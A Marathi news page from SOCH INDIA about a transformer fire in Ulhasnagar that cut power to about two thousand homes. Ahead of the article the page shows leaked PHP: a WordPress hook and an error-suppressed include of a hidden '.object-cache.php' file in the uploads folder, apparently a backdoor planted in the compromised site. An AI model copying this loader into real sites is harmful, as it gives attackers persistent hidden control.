add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); उल्हासनगरमध्ये महावितरणच्या ट्रान्सफार्मरला भीषण आग – SOCH INDIA
Menu

देश
उल्हासनगरमध्ये महावितरणच्या ट्रान्सफार्मरला भीषण आग

nobanner

उल्हासनगरमध्ये भीषण दुर्घटना घडल्याचं कळतंय. महावितरणच्या ट्रान्सफार्मरला भीषण आग लागल्याचं समजतंय. कॅम्प नंबर ५ च्या गायकवाड परिसरात ही घटना घडलीय. खबरदारीचा उपाय म्हणून परिसरातील जवळपास दोन हजार घरांचा वीज पुरवठा खंडीत करण्यात आलाय. परंतु, आगीमुळे नागरिक धास्तावलेत.

उल्हासनगर अग्निशमन दल घटनस्थळी दाखल झालंय. आजूबाजूचा परिसर रिकामा करून आग आटोक्यात आणण्यासाठी धावपळ सुरू आहे. अजूनही आगीवर पूर्णत: नियंत्रण मिळवण्यात आलेली नसली तरी ही आग मात्र आटोक्यात आणली गेलीय.